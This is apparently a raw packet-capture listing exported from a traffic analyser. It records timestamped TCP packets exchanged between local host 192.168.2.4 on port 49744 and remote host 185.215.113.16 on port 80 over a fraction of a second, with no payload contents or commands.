                                                                                                                                                                                                Nov 23, 2024 16:53:29.075005054 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.078272104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.078288078 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.078362942 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.079943895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.080140114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.080226898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.082720041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.082767010 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.082834005 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.085040092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.085256100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.085313082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.087524891 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.087616920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.087675095 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.089947939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.090015888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.090167046 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.092397928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.092516899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.092576981 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.094846964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.094959974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.095022917 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.097393036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.097528934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.097611904 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.098798990 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.098916054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.098979950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.100060940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.100182056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.100244999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.101433039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.101583004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.102518082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.102741957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.102901936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.102965117 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.104120016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.104240894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.104305029 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.105551958 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.105647087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.105707884 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.106854916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.106985092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.107048988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.108197927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.108335972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.108397961 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.109590054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.109714985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.109778881 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.110987902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.111104965 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.111177921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.112334967 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.112476110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.112545013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.113763094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.113812923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.113867044 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.115092993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.115250111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.115328074 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.116482019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.116592884 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.116642952 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.117825985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.117954016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.118016005 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.119201899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.119345903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.119410992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.120570898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.120703936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.120768070 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.121942997 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.122066975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.122126102 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.123357058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.123429060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.123483896 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.124847889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.124955893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.125019073 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.126091003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.126208067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.126275063 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.127445936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.127559900 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.127619982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.128817081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.128946066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.129004955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.130192041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.130300045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.130362034 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.131557941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.131670952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.131731987 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.132915974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.132968903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.133034945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.134342909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.134435892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.134496927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.135693073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.135811090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.135867119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.137043953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.137157917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.137216091 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.138432980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.138551950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.138617992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.139904022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.140011072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.140078068 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.141168118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.141279936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.141340971 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.142554998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.142606020 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.142668962 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.262268066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.262435913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.262523890 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.262737036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.262914896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.263006926 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.263015032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.264059067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.264144897 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.264411926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.265249014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.265307903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.265322924 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.266392946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.266446114 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.266504049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.267543077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.267607927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.267693996 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.268645048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.268707991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.268799067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.269839048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.269902945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.270061016 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.270953894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.271017075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.271071911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.272095919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.272164106 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.272265911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.273313999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.273371935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.273475885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.274342060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.274421930 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.274449110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.275532007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.275590897 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.275650978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.276648998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.276709080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.276951075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.277865887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.277909994 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.278007984 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.278948069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.279006004 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.279057980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.280047894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.280097008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.280136108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.281184912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.281264067 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.281286955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.282392025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.282468081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.282471895 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.283444881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.283550024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.283581018 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.284560919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.284617901 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.284667969 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.285759926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.285828114 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.285927057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.286890030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.286946058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.286957026 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.288037062 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.288093090 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.288161039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.289181948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.289235115 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.289305925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.290342093 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.290357113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.290390015 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.291443110 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.291511059 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.291569948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.292646885 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.292685032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.292706966 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.293759108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.293817043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.293823004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.294934988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.294994116 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.295079947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.296031952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.296087980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.296159029 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.297128916 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.297183990 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.297270060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.298319101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.298382998 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.298469067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.299499989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.299551010 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.299587011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.300728083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.300795078 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.300864935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.301716089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.301770926 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.301856995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.302902937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.303000927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.303035975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.304013014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.304059982 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.304133892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.305176973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.305238008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.305322886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.306329012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.306386948 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.306488037 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.307475090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.307534933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.307605028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.308578968 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.308628082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.308653116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.309688091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.309752941 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.309786081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.310909033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.310962915 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.311038017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.312024117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.312077999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.312158108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.313189983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.313237906 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.313241959 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.314270973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.314321995 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.314394951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.315452099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.315519094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.315592051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.316570044 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.316641092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.316710949 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.317706108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.317768097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.317841053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.318831921 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.318878889 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.318919897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.319996119 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.320050001 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.320053101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.321105003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.321166039 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:29.321237087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:29.365726948 CET4974480192.168.2.4185.215.113.16
